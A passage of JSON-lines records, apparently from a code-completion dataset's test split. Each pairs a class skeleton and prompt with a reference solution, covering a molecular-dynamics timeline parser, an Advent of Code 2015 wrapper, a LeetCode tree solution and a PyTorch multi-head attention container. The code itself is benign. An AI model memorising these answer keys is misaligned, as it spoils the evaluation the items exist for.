residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in 
timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000470", "length_bytes": 5752, "license_type": "no_license", "methods": [{"docstring": ":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency", "name": "__init__", "signature": "def __init__(self, timeline_files, timeline_props, timestep, frequency, name)"}, {"docstring": ":param residue: check if residue present in timeline :return: true if present", "name": "__contains__", "signature": "def __contains__(self, residue)"}, {"docstring": ":param residue: selected residue :return: get residue from timeline", "name": "get_resi", "signature": "def get_resi(self, residue)"}, {"docstring": "parse tml file", "name": "parse_tml", "signature": "def parse_tml(self)"}, {"docstring": ":param prop: :return:", "name": "get_prop", "signature": "def get_prop(self, prop)"}, {"docstring": ":param props: properties to plot", "name": "print_prop", "signature": "def print_prop(self, props)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001234", "prompt": "Implement the Python class `TimelineSegment` described below.\n\nClass description:\nImplement the TimelineSegment class.\n\nMethod signatures and docstrings:\n- def __init__(self, timeline_files, timeline_props, timestep, frequency, name): :param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\n- def __contains__(self, residue): :param residue: check if residue present in timeline :return: true if present\n- def get_resi(self, residue): :param residue: selected residue :return: get residue from timeline\n- def parse_tml(self): parse tml file\n- def get_prop(self, prop): :param prop: :return:\n- def print_prop(self, props): :param props: properties to plot", "prompted_full_text": "Implement the Python class `TimelineSegment` described below.\n\nClass description:\nImplement the TimelineSegment class.\n\nMethod signatures and docstrings:\n- def __init__(self, timeline_files, timeline_props, timestep, frequency, name): :param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\n- def __contains__(self, residue): :param residue: check if residue present in timeline :return: true if present\n- def get_resi(self, residue): :param residue: selected residue :return: get residue from timeline\n- def parse_tml(self): parse tml file\n- def get_prop(self, prop): :param prop: :return:\n- def print_prop(self, props): :param props: properties to 
plot\n\n<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "revision_id": "fdb8a1a14bcf0b372ebaf152f2bbb1f5d804172e", "skeleton": "<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", 
"snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TimelineSegment:\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n", "source": "the_stack_v2_python_sparse", "source_path": "dynamics_analysis/mm_analysis_timeline.py", "source_repo": "michal2am/bioscripts", "split": "test", "star_events_count": 3} {"blob_id": "a67028db1ac6093b14f47bcdae8bfaf5e41bcc51", "bodies": ["sets = collections()\nboss = Char(104, 8, 1)\nreturn part1(sets, boss)", "sets = collections()\nboss = Char(104, 8, 1)\nreturn part2(sets, boss)"], "bodies_text": "<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "class_docstring": "AoC 2015 Day 21", "class_name": "Day21", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = 
collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000471", "length_bytes": 3590, "license_type": "no_license", "methods": [{"docstring": "Given a filename, solve 2015 day 21 part 1", "name": "part1", "signature": "def part1(_filename: str) -> int"}, {"docstring": "Given a filename, solve 2015 day 21 part 2", "name": "part2", "signature": "def part2(_filename: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Day21` described below.\n\nClass description:\nAoC 2015 Day 21\n\nMethod signatures and docstrings:\n- def part1(_filename: str) -> int: Given a filename, solve 2015 day 21 part 1\n- def part2(_filename: str) -> int: Given a filename, solve 2015 day 21 part 2", "prompted_full_text": "Implement the Python class `Day21` described below.\n\nClass description:\nAoC 2015 Day 21\n\nMethod signatures and docstrings:\n- def part1(_filename: str) -> int: Given a filename, solve 2015 day 21 part 1\n- def part2(_filename: str) -> int: Given a filename, solve 2015 day 21 part 2\n\n<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "revision_id": "e89db235837d2d05848210a18c9c2a4456085570", "skeleton": "<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n", "source": "the_stack_v2_python_sparse", "source_path": "2015/python2015/aoc/day21.py", "source_repo": "mreishus/aoc", "split": "test", "star_events_count": 16} {"blob_id": "e563081bd06de46d07aa505d6e7670695d9dda24", "bodies": ["self.res = 0\nself.dfs(root)\nreturn self.res", "if not root:\n return 0\nleft = self.dfs(root.left)\nright = self.dfs(root.right)\nif root.left and root.left.val == root.val:\n left += 1\nelse:\n left = 0\nif root.right and root.right.val == root.val:\n right += 1\nelse:\n right = 0\nself.res = max(self.res, left + right)\nreturn max(left, right)"], "bodies_text": "<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "class_docstring": "", "class_name": 
"Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000472", "length_bytes": 1692, "license_type": "no_license", "methods": [{"docstring": "Args: root: TreeNode Return: int", "name": "longestUnivaluePath", "signature": "def longestUnivaluePath(self, root)"}, {"docstring": "Args: root: TreeNode Return: int", "name": "dfs", "signature": "def dfs(self, root)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def longestUnivaluePath(self, root): Args: root: TreeNode Return: int\n- def dfs(self, root): Args: root: TreeNode Return: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def longestUnivaluePath(self, root): Args: root: TreeNode Return: int\n- def dfs(self, root): Args: root: TreeNode Return: int\n\n<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "revision_id": "101bce2fac8b188a4eb2f5e017293d21ad0ecb21", "skeleton": "<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n self.res = 0\n self.dfs(root)\n return self.res\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n", "source": "the_stack_v2_python_sparse", "source_path": "code/687. 
最长同值路径.py", "source_repo": "AiZhanghan/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "fe15c9bfa4e5a2c0314ab4fba28d5c206524fcdd", "bodies": ["super(MultiheadAttentionContainer, self).__init__()\nself.nhead = nhead\nself.in_proj_container = in_proj_container\nself.attention_layer = attention_layer\nself.out_proj = out_proj\nself.batch_first = batch_first", "if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\ntgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\nq, k, v = self.in_proj_container(query, key, value)\nassert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\nhead_dim = q.size(-1) // self.nhead\nq = q.reshape(tgt_len, bsz * self.nhead, head_dim)\nassert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\nhead_dim = k.size(-1) // self.nhead\nk = k.reshape(src_len, bsz * self.nhead, head_dim)\nassert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\nhead_dim = v.size(-1) // self.nhead\nv = v.reshape(src_len, bsz * self.nhead, head_dim)\nattn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\nattn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\nattn_output = self.out_proj(attn_output)\nif self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\nreturn (attn_output, attn_output_weights)"], "bodies_text": "<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MultiheadAttentionContainer", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers 
(a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000473", "length_bytes": 13955, "license_type": "permissive", "methods": [{"docstring": "A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. 
The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu", "name": "__init__", "signature": "def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None"}, {"docstring": "Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use", "name": "forward", "signature": "def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002842", "prompt": "Implement the Python class `MultiheadAttentionContainer` described below.\n\nClass description:\nImplement the MultiheadAttentionContainer class.\n\nMethod signatures and docstrings:\n- def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None: A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\n- def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. 
bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use", "prompted_full_text": "Implement the Python class `MultiheadAttentionContainer` described below.\n\nClass description:\nImplement the MultiheadAttentionContainer class.\n\nMethod signatures and docstrings:\n- def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None: A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\n- def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\n\n<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. 
attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, 